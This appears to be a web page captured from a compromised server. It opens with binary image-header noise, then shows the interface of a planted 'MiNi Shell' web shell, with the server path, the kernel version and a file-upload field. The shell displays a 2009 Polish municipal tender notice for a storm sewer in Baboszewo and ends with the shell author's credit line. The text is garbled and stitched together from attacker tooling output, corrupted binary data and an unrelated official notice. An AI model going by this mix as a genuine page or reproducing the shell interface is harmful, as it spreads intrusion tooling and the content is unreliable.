JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090904/147921-N-2009.html

<p class="kh_header"><b>Baboszewo: Budowa sieci kanalizacji deszczowej z wpustami ulicznymi na ul. Warszawskiej
w Baboszewie (pow. płoński, woj. mazowieckie).</b><br>
<b>Numer ogłoszenia: 147921 - 2009; data zamieszczenia: 04.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Baboszewo , ul. Warszawska 9A, 09-130 Baboszewo, woj. mazowieckie, tel. 023 6611091 w. 34, faks 023 6611071.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugbaboszewo.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacji deszczowej z wpustami ulicznymi na ul. Warszawskiej
w Baboszewie (pow. płoński, woj. mazowieckie)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót:
      
1.	Roboty ziemne
2.	Roboty rozbiórkowe i naprawcze
3.	Roboty budowlano montażowe - kanalizacja deszczowa,

2.    Wykonanie czynności towarzyszących tj. zapewnienie i pokrycie kosztów  fachowego    
      nadzoru   geodezyjnego   w trakcie   budowy, a po jej zakończeniu  przedłożenie 
      protokołu  inwentaryzacji  powykonawczej

3.   Szczegółowy zakres przedmiotu zamówienia zawarty jest w:
       
-	DOKUMENTACJI PROJEKTOWEJ  opracowanej zgodnie z przepisami Prawa budowlanego i 
       spełniających wymagania rozporządzenia Ministra Infrastruktury z dnia 03 lipca 2003 r. w sprawie 
       szczegółowego zakresu i formy projektu budowlanego (Dz.U. Nr 120, poz. 1133)
 
            PRZEDMIARZE ROBÓT zawierającym zestawienie przewidywanych do wykonania robót w kolejności 
            technologicznej ich wykonania wraz z ich szczegółowym opisem, wskazaniem podstaw ustalających 
            szczegółowy opis , z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych oraz 
            wskazaniem podstaw do ustalania cen jednostkowych robót. 
            Przedmiar uwzględnia wymagania określone w paragrafach  od 6 do 10 rozporządzenia Ministra 
            Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i form dokumentacji 
            projektowej, specyfikacji technicznych wykonania o odbioru robót budowlanych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-0, 45.23.13.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> WADIUM  -   10.000 zł  (słownie:  - dziesięć tysięcy złotych- ) 
         Wadium należy wnieść zgodnie z art. 45 ust. 6 ustawy - Prawo zamówień publicznych, w jednej lub kilku 
         następujących formach:
         - pieniądzu,
-	poręczeniach bankowych lub poręczeniach pieniężnych spółdzielczej kasy oszczędnościowo-
      kredytowej.,
         - gwarancjach bankowych,
         - gwarancjach ubezpieczeniowych. 
         - poręczeniach udzielonych przez podmiot, o których mowa w art.6  ust.3 pkt.4 lit.b ustawy z dnia 9 
           listopada      2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz.U. z 2007 r. Nr 42 
            poz.275) 
          W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego 
          wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego
          w kasie Urzędu Gminy Baboszewo lub dołączyć do oferty.

     2.  Wadium wnoszone w pieniądzu  wpłaca się  na rachunek bankowy Zamawiającego:   
    Bank Spółdzielczy w Płońsku  Nr 73 8230 0007 0005 6300 2000 0004
    W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin 
    uznania kwoty na rachunku Zamawiającego.

3.	Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy wspólnie wnoszą jedno wadium  10.000 zł.
4.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy  którzy spełniają następujące warunki określone 
    w art. 22 ust.1 P.z.p.
a) posiadają uprawnienia do wykonania określonej działalności  lub czynności , jeżeli ustawy
          nakładają obowiązek posiadania takich uprawnień,     

b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem techniczny i osobami
           zdolnymi do wykonania zamówienia,
         -  Udokumentowanie, że w okresie ostatnich pięciu lat Wykonawca   zrealizował  (był głównym 
             wykonawcą)   co najmniej  dwie   roboty  o podobnym charakterze i złożoności co 
             przedmiot zamówienia o  wartości  każdej z nich nie mniejszej jak w ofercie. 
                                                         
         -   Kierownik budowy musi posiadać uprawnienia do kierowania robotami branży budowlanej   
             o specjalności w zakresie sieci kanalizacyjnych   i  dysponować co najmniej 2 letnim 
             doświadczeniem w zakresie  robót o równoważnym charakterze i wielkości. 

          -    Wykonawca  musi dysponować następującym  wyposażeniem technicznym.
.	Samochód ciężarowy samowyładowczy o ład. min. 7,5 ton -  1 szt. 
.	Koparko-ładowarka -  - 1 
.	Spycharka - 1 
.	Zestaw igłofiltrów   - 1

     c) znajdują się w sytuacji finansowej zapewniającej wykonanie zamówienia,

          -   Polisa lub inny dokument ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony 
              od odpowiedzialności  cywilnej w zakresie prowadzonej działalności gospodarczej. 
       Suma gwarancyjna min. 500 000 zł  

d)	          nie podlegają wykluczeniu z postępowania o udzielenie zamówienia  (na podstawie art.24 ust.1 i    
                ust.  2  P.z.p.).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Celem potwierdzenia spełnienia warunków udziału w postępowaniu  oraz dla uznania formalnej poprawności, oferta (Formularz ofertowy - załącznik Nr I.1 do SIWZ) oprócz  oświadczenia wykonawcy (Załącznik Nr I.2a i I.2b ) o którym mowa w art. 44  ustawy Prawo zamówień Publicznych   musi zawierać następujące dokumenty: 


A. Dokumenty potwierdzające wymogi formalne:
1)   Dokumenty potwierdzające spełnienie warunków określonych przepisami art. 22 ust.1 ustawy Prawo
Zamówień publicznych (zgodnie z  Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 
w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 87, poz.  605 zmiana: Dz.U. z 2008 r. Nr 188, poz. 1155) 

a)	aktualny odpis z właściwego rejestru albo aktualne  zaświadczenie o wpisie do ewidencji   
      działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do   
      ewidencji działalności gospodarczej (wystawiony nie wcześniej jak 6 miesięcy przed terminem    
      składania  ofert)

b)	aktualne zaświadczenie   właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności , lub wstrzymanie w całości wykonania decyzji właściwego organu podatkowego wystawionego nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert.  
c)	dowód wniesienia wadium 
                                                       
      B. Dokumenty potwierdzające, że Wykonawca  posiada niezbędna wiedzę 
           i doświadczenie   oraz dysponuje potencjałem technicznym i osobami zdolnymi do 
            wykonania  zamówienia oraz znajduje się w sytuacji ekonomicznej zapewniającej   
            wykonanie zamówienia, 

1)   Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu  zamówienia wraz z informacjami  
      na temat ich kwalifikacji zawodowych, doświadczenia , a także zakresu wykonywanych przez nich 
      czynności  +  kserokopie uprawnień do kierowania robotami budowlanymi w specjalności  
       w zakresie sieci kanalizacyjnych  + zaświadczenie z właściwej izby 
              samorządu zawodowego, potwierdzających  przynależność do izby na dzień składania ofert.
               Informacja na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich trzech lat, a w 
               przypadku gdy okres działalności jest krótszy  - w tym okresie.
               lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału   
               technicznego i osób zdolnych do wykonania zamówienia.
               Informacja na załączonym formularzu ZATRUDNIENIE-Załącznik Nr I.5  lub na druku opracowanym przez 
                  Wykonawcę)
2)	 Umowa regulująca współpracę podmiotów występujących wspólnie  -  Uwaga!  Wymagana  tylko w    
       przypadku składaniu  oferty wspólnej  przez kilka podmiotów  (dotyczy także spółek cywilnych) 
             
      3)     Wykaz niezbędnych do wykonanie zamówienia  urządzeń i sprzętu  , jakimi dysponuje  Wykonawca
       (na załączonym formularzu WYPOSAŻENIE - Załącznik nr I.4 lub na druku opracowanym przez Wykonawcę)
                                                  
4)   Wykaz wykonanych robót budowlanych  w okresie ostatnich pięciu lat przed dniem wszczęcia 
       postępowania o udzielenie zamówienia,  a jeżeli okres działalności  jest krótszy  - w tym okresie,   
      odpowiadających swoim rodzajem i wartością robotom  budowlanym stanowiącym przedmiot   
      zamówienia:  opis wykonanych robót, termin  rozpoczęcia i zakończenia realizacji robót,    wartość     
        zrealizowanych  robót, nazwa adres i nr telefonu Zamawiającego. 
      (Na załączonym formularzu  DOŚWIADCZENIE WYKONAWCY  -Załącznik    Nr I.3   lub na druku opracowanym   przez 
        Wykonawcę)
      Co najmniej dwa dokumenty  potwierdzające , że roboty zostały   wykonane  należycie (referencje lub: 
      rekomendacje, listy polecające podpisane protokoły odbioru, inne  dokumenty, z których treści wynika, 
      że  roboty budowlane zostały wykonane należycie) 
      
5)    Polisa lub inny dokument ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony 
              od odpowiedzialności  cywilnej w zakresie prowadzonej działalności gospodarczej. 
              Suma gwarancyjna min. 500 000 zł  
              Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia                  
               Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są   
               ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie   
                mniejszej niż 500 000 PLN.


D.	Inne dokumenty:
             1) Formularz umowy  zaakceptowany przez Wykonawcę Załącznik Nr I.6
             2) Harmonogram realizacji robót Załącznik Nr  I.7
3) Wykonawca oprócz harmonogramu rzeczowo -finansowego może załączyć do oferty 
     własny szczegółowy kosztorys wykonania robót,  sporządzony w oparciu o przedmiar robót 
     i dokumentację projektową.  

  2.   Wymogi  formalne odnoszące się do wykonawców składających oferty wspólnie. 
        Składając ofertę wspólnie (art.23 ustawy Prawo zamówień publicznych) przez dwóch lub więcej   
        Wykonawców należy zwrócić uwagę w szczególności na następujące wymagania:
a)	następujące dokumenty i oświadczenia: 
-	oferta, (Załącznik I.1)
-	wykaz wykonanych robót budowlanych (Załącznik Nr I.3 do SIWZ),
-	oświadczenie o spełnianiu warunków podanych w art. 22 ust. 1) ustawy (Załącznik Nr I.2a
             i Nr I.2b  do SIWZ), 
podpisują wszyscy członkowie konsorcjum lub Pełnomocnik w imieniu całego konsorcjum.

b)	następujące dokumenty i oświadczenia: 
-	oświadczenie o spełnianiu warunku podanego w art. 22 ust. 1 pkt 4 w związku z art. 24 ust. 1 pkt 1 - 9 ustawy (Załącznik Nr  I.2 a i I.2 bdo SIWZ),
-	odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, 
-	zaświadczenie naczelnika urzędu skarbowego, 
-	zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, 
-	dokumenty potwierdzające, że roboty  te zostały wykonane należycie
składa każdy z członków konsorcjum w imieniu własnym.

 3.  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia musza ustanowić pełnomocnika do reprezentowania ich w postępowaniu oraz zawarcia umowy w sprawie niniejszego zamówienia. Pełnomocnictwo, z którego powinien wynikać zakres umocowania dla pełnomocnika ustanowionego przez Wykonawców  wspólnie ubiegających się o udzielenie zamówienia, należy załączyć do oferty.  Wszelka korespondencja między zamawiającym a Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia będzie kierowana do ustanowionego pełnomocnika ze skutkiem dla mocodawców.  Pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną.

4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej    
Polskiej składa dokumenty określone w § 2 ust.1 rozporządzenia Prezesa Rady Ministrów z dnia 
19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawców oraz form , w jakich te dokumenty mogą być składane.  (Dz.U. z 24.05.2006 r. Nr 87, poz. 605 zmiana:  Dz.U. Nr 188, poz. 
1155)
5. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ugbaboszewo.bip.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Baboszewo
09-130 Baboszewo, ul. Warszawska 9 A, pok. Nr 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2009 godzina 11:00, miejsce: Urząd Gminy Baboszewo
09-130 Baboszewo, ul. Warszawska 9 A, pok. Nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com